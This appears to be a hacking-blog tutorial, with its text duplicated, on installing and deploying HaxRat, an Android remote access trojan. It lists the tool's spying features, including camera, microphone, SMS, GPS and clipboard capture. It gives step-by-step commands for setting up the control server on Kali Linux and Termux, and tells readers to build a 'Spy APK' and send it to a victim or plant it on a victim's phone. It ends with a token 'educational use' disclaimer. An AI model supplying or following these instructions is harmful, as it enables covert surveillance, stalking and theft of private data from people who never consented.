Tweet

Take Total Control on Android Remotely: HaxRat HaxRat is a cloud-based remote android management suite in simple word it is an Android RAT, powered by NodeJS. It works in Linux and Termux (Android). Previously we have featured an article on L3MON, HaxRat is based on L3MON but much more powerful then L3MON. It has some extra features like the screenshot, screen recording, front and rear camera recording. The Key features of HaxRat are the following: Key Features of HaxRat Screenshot Capture. Screen Recorder. Rear Camera Recorder. Front Camera Recorder. Lock Device. GPS Logging. Microphone Recording. View Contacts. SMS Logs. Send SMS. Call Logs. View Installed Apps. View Stub Permissions. Live Clipboard Logging. Live Notification Logging. View WiFi Networks (logs previously seen). File Explorer & Downloader. Command Queuing. Built-In APK Builder. We can easily install this suite on Linux, we also can install it on our Android phone by using Termux. Installing HaxRat on Kali Linux The installation process is the same as we did in our L3MON tutorial. We have a detailed discussion on our that post So we are not going to explain the commands. First, we install JRE in Kali by using the following command: sudo apt-get install openjdk-8-jre Then we download NodeJs in our system by applying the following command: curl -sL https://deb.nodesource.com/setup_13.x | sudo bash - Now we install NodeJs by preceding following command: sudo apt-get install -y nodejs Now we need pm2 process manager to install this we use the following command: sudo npm install pm2 -g Now we clone haxRat from it’s GitHub repository by using the following command: git clone https://github.com/Hax4us/haxRat Then we navigate to the server directory under haxRat by using cd command: cd /haxRat/server Then we need to install dependencies by using the following command: npm install Then we start the server by using the following command: node index.js Now we can see our server in our browser http://localhost:22533 there will be a login page like the following screenshot: Now we stop this server by using CTRL+C command. Now, what to do? Login? But where are the credentials?  We have talked before how to create a custom credential on our older L3MON tutorial. Otherwise check the haxRat GitHub repository for default credentials. After login we can see the main page as shown in the following screenshot: Now we go to the APK Builder page and give our local IP address and click on build. If a got  error like “Wrong java Version installed…..” this when building APK then try the following command: sudo update-alternatives --config java Then we type 2 and enter. Then we stop our running haxRat server by CTRL+C and start it again this problem will be solved. Now we can build Spy APK and send it to the victim, whenever the victim installs it and grant the permission. Or if we got a victim’s phone in hand then we can implement this. We got the victim in our haxRat dashboard like the following screenshot: Installing HaxRat on Android (using Termux) This is easy to install in Termux. We try following commands one after another to install and configure haxRat. apt install nodejs git clone https://github.com/hax4us/haxRat.git cd haxRat/server npm install mkdir ~/haxrat haxrat node index.js In our browser, we navigate to Http://<Local IP>:22533 and we will be the login screen of haxRat. This is how we can start the haxrat server and take control of any android device on our local network. We also can run this on a wide network or internet by using PortMap service. Disclaimer Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool or this tutorial. HaxRat is built and our article is documented for both Educational and Internal use ONLY.

 Take Total Control on Android Remotely: HaxRat

HaxRat is a cloud-based remote android management suite in simple word it is an Android RAT, powered by NodeJS. It works in Linux and Termux (Android).

Previously we have featured an article on L3MON, HaxRat is based on L3MON but much more powerful then L3MON. It has some extra features like the screenshot, screen recording, front and rear camera recording. The Key features of HaxRat are the following:

Key Features of HaxRat

• Screenshot Capture.
• Screen Recorder.
• Rear Camera Recorder.
• Front Camera Recorder.
• Lock Device.
• GPS Logging.
• Microphone Recording.
• View Contacts.
• SMS Logs.
• Send SMS.
• Call Logs.
• View Installed Apps.
• View Stub Permissions.
• Live Clipboard Logging.
• Live Notification Logging.
• View WiFi Networks (logs previously seen).
• File Explorer & Downloader.
• Command Queuing.
• Built-In APK Builder.

We can easily install this suite on Linux, we also can install it on our Android phone by using Termux.

Installing HaxRat on Kali Linux

The installation process is the same as we did in our L3MON tutorial. We have a detailed discussion on our that post So we are not going to explain the commands.

First, we install JRE in Kali by using the following command:

sudo apt-get install openjdk-8-jre

Then we download NodeJs in our system by applying the following command:

curl -sL https://deb.nodesource.com/setup_13.x | sudo bash -

Now we install NodeJs by preceding following command:

sudo apt-get install -y nodejs

Now we need pm2 process manager to install this we use the following command:

sudo npm install pm2 -g

Now we clone haxRat from it’s GitHub repository by using the following command:

git clone https://github.com/Hax4us/haxRat

Then we navigate to the server directory under haxRat by using cd command:

cd /haxRat/server

Then we need to install dependencies by using the following command:

npm install

Then we start the server by using the following command:

node index.js

Now we can see our server in our browser http://localhost:22533 there will be a login page like the following screenshot:

Now we stop this server by using CTRL+C command. Now, what to do? Login? But where are the credentials?  We have talked before how to create a custom credential on our older L3MON tutorial. Otherwise check the haxRat GitHub repository for default credentials.

After login we can see the main page as shown in the following screenshot:

Now we go to the APK Builder page and give our local IP address and click on build.

If a got  error like “Wrong java Version installed…..” this when building APK then try the following command:

sudo update-alternatives --config java

Then we type 2 and enter.

Then we stop our running haxRat server by CTRL+C and start it again this problem will be solved.

Now we can build Spy APK and send it to the victim, whenever the victim installs it and grant the permission. Or if we got a victim’s phone in hand then we can implement this.

We got the victim in our haxRat dashboard like the following screenshot:

Installing HaxRat on Android (using Termux)

This is easy to install in Termux. We try following commands one after another to install and configure haxRat.

apt install nodejs

git clone https://github.com/hax4us/haxRat.git

cd haxRat/server

npm install

mkdir ~/haxrat 

haxrat

node index.js

In our browser, we navigate to Http://<Local IP>:22533 and we will be the login screen of haxRat.

This is how we can start the haxrat server and take control of any android device on our local network. We also can run this on a wide network or internet by using PortMap service.

Disclaimer

Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool or this tutorial.
HaxRat is built and our article is documented for both Educational and Internal use ONLY.